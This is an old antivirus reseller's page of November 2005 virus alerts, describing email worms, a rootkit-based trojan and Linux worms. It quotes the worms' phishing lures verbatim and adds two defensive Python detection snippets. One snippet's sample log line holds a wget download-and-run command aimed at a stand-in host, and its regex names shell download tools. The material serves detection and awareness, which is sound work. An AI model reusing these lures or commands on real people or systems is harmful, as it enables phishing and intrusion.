Virus alerts for Nov 2005
Computer virus alert
By the time you receive the e-mail 'virus alert' it can be too late!
We stock the most efficient antivirus program, which checks for updates hourly.

Contact Us for a one month free antivirus trial.
Add "Virus Trial" to the Comments area.
Free trial antivirus

Virus Alerts Nov 2005

November 25 2005 WORM_MYTOB.MX

This memory-resident worm, MYTOB.MX, spreads copies of itself as attachments to email messages, which it sends to target addresses using its own Simple Mail Transfer Protocol (SMTP) engine. Because it carries its own SMTP engine, it can send these messages without relying on other mail applications such as Microsoft Outlook.

The email message that it sends has the following details:

From: (Spoofed)

Subject: (any of the following)
• DETECTED Online User Violation
• Important Notification
• MEMBERS SUPPORT
• Notice Account limitation
• Security Measures
• WARNING MESSAGE YOUR SERVICES NEAR TO BE CLOSED
• You have successfully updated your password
• Your Account is Suspended
• Your Account is Suspended For Security Reasons
• Your password has been successfully updated
• Your Password has been updated

Message Body: (any of the following)
Dear {User Profile} Member,

Your e-mail account was used to send a huge amount of unsolicited spam messages during the recent week. If you could please take 5-10 minutes out of your online experience and confirm the attached document so you will not run into any future problems with the online service.

If you choose to ignore our request, you leave us no choice but to cancel your membership.

Virtually yours,
The {User Profile}, Support Team

===========

Dear user {User Profile},

It has come to our attention that your {User Profile}, ( x ) records are out of date. For further details see the attached document.

Thank you for using {User Profile}!
The {User Profile} Support Team
+++ Attachment: No Virus (Clean)
+++ "Name" Antivirus - www.{User Profile}.com

===========

Dear user {User Profile},

You have successfully updated the password of your {User Profile} account.

If you did not authorize this change or if you need assistance with your account, please contact customer service at: register@{User Profile}.com

Thank you for using {User Profile}!
The {User Profile} Support Team
+++ Attachment: No Virus (Clean)
+++ "Name" Antivirus - www. {User Profile}.com

===========

Dear {User Profile} Member,

We have temporarily suspended your email account {User Profile}. This might be due to either of the following reasons:
1. A recent change in your personal information (i.e. change of address).
2. Submiting invalid information during the initial sign up process.
3. An innability to accurately verify your selected option of
subscription due to an internal error within our processors.
See the details to reactivate your {User Profile} account.
Sincerely,The Support Team
+++ Attachment: No Virus (Clean)
+++ {User Profile}Antivirus www.{User Profile}

NOTE: {User Profile} is the computer's domain user name.

Attachment: (any of the following file names)
• accepted-password
• account-details
• account-info
• account-password
• account-report
• approved-password
• documeng
• email-details
• email-password
• important-details
• new-password
• password
• readme
• updated-password

This worm also propagates via network shares. It searches for available shared folders within the network and attempts to drop copies of itself into these shares. It also generates random IP addresses and attempts to drop copies of itself into the said addresses' default shares. It uses the account details of the currently logged user to gain access to password-protected shares.

It has backdoor capabilities, which enable a remote malicious user to perform commands on the affected system, thus compromising system security.

It runs on Windows NT, 2000, and XP.


Top 10 Most Prevalent Global Malware
(from November 18 to November 24, 2005)

1. WORM_MYTOB.MX
2. WORM_SOBER.AG
3. SPYW_GATOR.F
4. WORM_NETSKY.P
5. HTML_NETSKY.P
6. WORM_MOFEI.B
7. PE_PARITE.A
8. TSPY_SMALL.SN
9. TROJ_ISTBAR.FN
10. ADW_LOP.A

November 21 2005 WORM_SOBER.AG

We have received several infection reports indicating that this malware is spreading in the USA, Belgium, Canada, Brazil, and New Zealand.

This memory-resident worm propagates by attaching a copy of itself to an email message, which it sends to target recipients using its own Simple Mail Transfer Protocol (SMTP) engine. Since its email propagation requires no user intervention, the user is often unaware that the worm is sending out email messages.

The email it sends out has the following details:

From: {Email address generated by this worm}

Subject: (any of the following)
• hi,_ive_a_new_mail_address
• Mail delivery failed
• Registration Confirmation
• smtp mail failed
• Spam: Registration Confirmation
• Your Password
• Your IP was logged
• Paris_Hilton_&_Nicole_Richie
• You visit illegal websites

Message body: (any of the following)
hey its me, my old address dont work at time. i dont know why?!
in the last days ive got some mails. i' think thaz your mails but im not sure!
plz read and check ...
cyaaaaaaa

---

This is an automatically generated Delivery Status Notification.

SMTP_Error []
I'm afraid I wasn't able to deliver your message.
This is a permanent error; I've given up. Sorry it didn't work out.
The full mail-text and header is attached

---

Account and Password Information are attached!
***** Go to: http://www.{random}.com
***** Email: {random}.com

---

Dear Sir/Madam,

we have logged your IP-address on more than 30 illegal Websites.
Important:
Please answer our questions!
The list of questions are attached.

Yours faithfully,
Steven Allison

*** Federal Bureau of Investigation -FBI-
*** 935 Pennsylvania Avenue, NW, Room 3220
*** Washington, DC 20535
*** phone: (202) 324-3000

---

Account and Password Information are attached!

---

The Simple Life:
View Paris Hilton & Nicole Richie video clips , pictures & more
Download is free until Jan, 2006!
Please use our Download manager.

Attachment: (any of the following)
• mailtext.zip
• mail.zip
• reg_pass.zip
• mail.zip
• reg_pass-data.zip
• question_list.zip
• list.zip
• downloadm
• mail_body.zip

The attached .ZIP file contains the copy of this worm using the following file name:
File-packed_dataInfo.exe

When executed, it displays a fake error message box in order to trick a user into thinking that the file did not properly execute.

This worm searches the process list of the affected system for mrt.exe, the Microsoft Windows Malicious Software Removal Tool process. If found, it terminates the said process thus making the system more vulnerable to malicious attacks.
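As an added example that is not part of the original alert page, the following Python triage helper checks an incoming message against a subset of the subject lines, attachment names and body fragments listed above for WORM_MYTOB.MX and WORM_SOBER.AG; the indicator table, the sample messages and the example.com domain are constructed for illustration.

```python
from email.message import EmailMessage

# Subset of the subject lines, attachment names and body fragments listed in the
# alerts above (constructed table; extend it from the full lists as needed).
INDICATORS = {
    "WORM_MYTOB.MX": {
        "subjects": {"your account is suspended", "security measures", "important notification"},
        "attachments": {"account-info", "account-details", "password", "readme"},
        "body": ["+++ attachment: no virus (clean)", "confirm the attached document"],
    },
    "WORM_SOBER.AG": {
        "subjects": {"your ip was logged", "mail delivery failed", "your password"},
        "attachments": {"mailtext.zip", "reg_pass.zip", "question_list.zip", "list.zip"},
        "body": ["logged your ip-address", "i wasn't able to deliver your message"],
    },
}

def matched_indicators(msg):
    """Return {worm: [reasons]} for each worm whose listed lures the message matches."""
    subject = (msg.get("Subject") or "").strip().lower()
    part = msg.get_body(preferencelist=("plain",))
    body = part.get_content().lower() if part else ""
    names = [p.get_filename().lower() for p in msg.iter_attachments() if p.get_filename()]
    hits = {}
    for worm, ind in INDICATORS.items():
        reasons = ["subject"] if subject in ind["subjects"] else []
        for name in names:  # MYTOB names are listed without extension, SOBER's with .zip
            if name in ind["attachments"] or name.rsplit(".", 1)[0] in ind["attachments"]:
                reasons.append("attachment:" + name)
        if any(frag in body for frag in ind["body"]):
            reasons.append("body")
        if reasons:
            hits[worm] = reasons
    return hits

def build_sample(subject, body, filename):
    """Constructed message mimicking the lures above (sender header deliberately omitted)."""
    msg = EmailMessage()
    msg["Subject"] = subject
    msg.set_content(body)
    msg.add_attachment(b"not a real executable", maintype="application",
                       subtype="octet-stream", filename=filename)
    return msg

MYTOB_SAMPLE = build_sample("Your Account is Suspended", "Dear example.com Member,\n"
    "Please confirm the attached document.\n+++ Attachment: No Virus (Clean)", "account-info.zip")
SOBER_SAMPLE = build_sample("Your IP was logged",
    "we have logged your IP-address on more than 30 illegal Websites.", "question_list.zip")
CLEAN_SAMPLE = build_sample("Lunch on Friday?", "See you at noon.", "menu.pdf")
```

A single match (for instance the subject alone) is only a hint; the samples show how the listed lures stack subject, attachment name and body fragment together.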


November 18 2005 Trojans Utilise Kernel-mode Rootkit - BKDR_BREPLIBOT.A

In the past week, much attention has been given to the BREPLIBOT family of backdoor Trojans. This Trojan exploits the Sony Digital Rights Management rootkit, and this new malware also targets a specific audience: the business community. Arriving as an attachment in an email, the malware pretends to come from a reputable business magazine, asking the recipient to verify his or her "picture" (apparently attached to the email) to be used for the December issue. However, rather than presenting a picture, executing the attachment installs the Trojan.

The issue is less about the Trojan than about the underlying rootkit technology it utilizes: the rootkit used by the BKDR_BREPLIBOT Trojans is a 'kernel-mode' program, which can be put to far more damaging malicious use than a 'user-mode' program.

“We don’t blame Sony for attempting to exercise its right to manage its digital property”. “However, what’s important to understand is that this technology can now be used by malicious malware writers to hide and spread their creations. These writers include those who might not know how to write their own rootkits – but now they don’t have to.”

May we add a strong recommendation that businesses with the need to protect their intellectual property look into other possible solutions, such as building a level of security commitment into contractual agreements with technology partners, especially when those partners are developing additional DRM (digital rights management) tools.

"The protection of Corporate Intellectual Property in the digital age is a complex and serious matter for any business. This situation emphasizes the growing complexity of corporate security, both from an IT and business continuity standpoint. It makes clear the need for a consolidation of business and security as one unified initiative."

The primary danger of kernel-mode drivers is that they can modify or destroy any other data structure in memory, including the operating system code itself. This is because kernel mode is inherently granted the highest level of access in a system and can therefore be used to perform nearly any task, including overwriting any other program or data on the system. The objective of rootkits is to conceal the existence of other programs; in practice, they are frequently used to conceal spyware or other malware. And since rootkits are readily available, we expect to see rootkit detection numbers rise.

We are reminding users to remain vigilant. As a precautionary measure, every email should be scrutinized, especially those containing attachments or coming from unexpected or unknown sources, and users should ensure their security solutions are fully updated. We also recommend that technical users and IT staff educate themselves about the growing rootkit threat.


Top 10 Most Prevalent Global Malware
(from November 11 to November 17, 2005)

1. JAVA_BYTEVER.A
2. SPYW_DASHBAR.300
3. SPYW_GATOR.F
4. WORM_NETSKY.P
5. HTML_NETSKY.P
6. WORM_MOFEI.B
7. PE_PARITE.A
8. TSPY_SMALL.SN
9. TROJ_ISTBAR.FN
10. ADW_LOP.A


November 11 2005 Worms Create their own Bot Network - ELF_LUPPER.A & ELF_LUPPER.B

Earlier this week, researchers at antivirus and content security firms warned users to remain extra vigilant regarding the patching of systems, following the recent family of worms which targeted the Linux operating system. ELF_LUPPER.A and ELF_LUPPER.B, which were discovered at the beginning of the week, were built to exploit vulnerabilities in certain web applications, rather than anything inherent in the Linux kernel. Though the worms were compiled to attack Linux, it is important to note that the source code could potentially be recompiled for other systems that are related to Linux.

According to analysts, both worms utilized the same set of vulnerabilities, especially the XML-RPC vulnerability, which was first made public on June 27, 2005. The corresponding exploits for these vulnerabilities were posted a month later to a well-known public Web site for viewing and posting new exploits. These were network worms, capable of self-propagation with no user interaction necessary.

These network worms exploited vulnerabilities that enabled them to stealthily connect to a Web site, where they could download and execute copies of themselves to a victim’s system. The worms focused on building their own bot network, which can give the writer more information that could be utilized to launch a larger attack in the future.

Both worms utilized the base code of the Linux Slapper worm, which was discovered in September 2002. The writer(s) of the ELF_LUPPER worms removed the SSL exploit, replacing it with two known vulnerabilities, AWStats and XML-RPC. These worms are believed to be related to a hacker tool, HKTL_CALLBACK, discovered November 3, 2005. The probable purpose of the hack tool was to bypass victims’ firewalls and surreptitiously collect information to aid the worm attacks.

We advise users to ensure their systems contain the most recent security patches and to remain vigilant, regardless of which operating system they use. “It’s important to remember that this is open source, so it may be relatively easy to supplement the current malware with additional exploit code, capabilities, etc., thereby generating future variants”.

Even though Linux still trails Windows in user numbers, users are strongly advised to be aware of the security issues concerning their systems. Security experts added that this attack is really just an example of how nearly every system has vulnerabilities, and that users should remain vigilant at all times, regardless of their OS.

Security experts recommend that users take the following measures to protect against the ELF_LUPPER family of worms as well as other attacks:

  • Ensure your system is patched with the most current system update
  • Ensure your antivirus definitions are updated. NOD32 updates automatically and is regarded by Virus Bulletin as the best antivirus available.
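As an added example, not part of the original alert, this Python snippet reviews web-server access logs for requests aimed at the two applications the alert names as the worms' targets, AWStats and XML-RPC, and separates plain probes from requests whose query carries download-and-run shell tokens; the script file names, the token heuristic and the log lines are assumptions constructed for illustration, not details taken from the page.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# The alert names AWStats and XML-RPC as the exploited applications; these script
# names are assumptions (their usual file names), not quoted from the page.
TARGET_PATHS = ("awstats.pl", "xmlrpc.php")
# Heuristic (assumption): a request to those scripts whose decoded query carries
# shell-style download-and-run tokens is treated as an exploitation attempt.
SHELL_TOKENS = re.compile(
    r"(?:;|\|\||&&|`|\$\()\s*(?:wget|curl|chmod|sh|perl)\b|(?:wget|curl)\s+https?://", re.I)
# Apache combined log format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')

def classify(line):
    """Return (ip, path, reason) for a request aimed at a target script, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m["url"].partition("?")
    query = unquote_plus(query)
    if not path.lower().endswith(TARGET_PATHS):
        return None
    if SHELL_TOKENS.search(query):
        return (m["ip"], path, "shell tokens in query")
    return (m["ip"], path, "target script probed")

def summarize(lines):
    """Per source address: which target scripts it touched and how many exploit-like requests."""
    per_ip = defaultdict(lambda: {"scripts": set(), "exploit_like": 0})
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        ip, path, reason = hit
        per_ip[ip]["scripts"].add(path.rsplit("/", 1)[-1].lower())
        if reason.startswith("shell"):
            per_ip[ip]["exploit_like"] += 1
    return dict(per_ip)

# Constructed log lines; 192.0.2.0/24 and 203.0.113.0/24 are documentation address ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Nov/2005:03:14:07 +0000] "GET /cgi-bin/awstats.pl?config=site HTTP/1.1" 200 5120',
    '192.0.2.77 - - [12/Nov/2005:03:14:09 +0000] "GET /cgi-bin/awstats.pl?p=;wget%20http://203.0.113.9/run.sh HTTP/1.0" 500 0',
    '192.0.2.77 - - [12/Nov/2005:03:14:10 +0000] "POST /xmlrpc.php HTTP/1.0" 200 311',
    '192.0.2.30 - - [12/Nov/2005:03:15:02 +0000] "GET /index.html HTTP/1.1" 200 2048',
]
```

A source that touches both target scripts within seconds, as 192.0.2.77 does here, is the pattern a self-propagating scanner leaves; POST bodies are not in the access log, so XML-RPC requests can only be counted, not inspected, from this data.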


Top 10 Most Prevalent Global Malware
(from November 04 to November 10, 2005)

1. TROJ_BAGLE.AB
2. WORM_NETSKY.P
3. JAVA_BYTEVER.A
4. SPYW_DASHBAR.300
5. SPYW_GATOR.F
6. HTML_NETSKY.P
7. TROJ_ISTBAR.FN
8. PE_PARITE.A
9. TSPY_SMALL.SN
10. WORM_MOFEI.B


November 04 2005 More bagle worms

Researchers have discovered two new variants of the notorious BAGLE family of worms. Although WORM_BAGLE.BQ and WORM_BAGLE.BS have not caused a high number of infections, they are utilizing a relatively new technique – adding a downloader between the Trojan and worm components as part of a “tri-component” technique – which enables a far more dynamic spreading mechanism and a higher potential for damage. Although security experts first saw this technique in mid-September with a series of other BAGLE variants, its re-emergence suggests that this could become more prominent – and destructive – in the future.

The URLs to which the code points are continuously changing to prevent the downloader from being detected. At times they appear to be down, then they are brought back up again. This appears to give the author enough time to repack the code, thereby modifying the identifying file.

Security experts warn that these new variants could possibly mark the beginning of a concerning trend. A future variant with a slightly better refined propagation technique – including the use of a packer with polymorphic capabilities and utilizing an established Bot network – could lead to a significant number of infections.


Top 10 Most Prevalent Global Malware
(from October 28 to November 03, 2005)

1. JAVA_BYTEVER.A
2. SPYW_DASHBAR.300
3. WORM_NETSKY.P
4. SPYW_GATOR.F
5. HTML_NETSKY.P
6. TROJ_BAGLE.AB
7. TSPY_SMALL.SN
8. WORM_MOFEI.B
9. ADW_LOP.A
10. PE_PARITE.